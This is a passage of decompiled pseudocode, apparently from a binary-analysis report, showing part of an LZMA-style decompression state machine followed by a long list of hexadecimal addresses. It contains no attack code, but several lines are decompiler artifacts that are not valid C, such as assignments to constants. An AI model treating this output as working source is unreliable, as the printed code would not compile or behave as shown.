												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                0x00000000
                                                0x00406e9d
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecf
                                                0x00406ed5
                                                0x00406ee7
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ea3
                                                0x00406ea9
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x0040726d
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
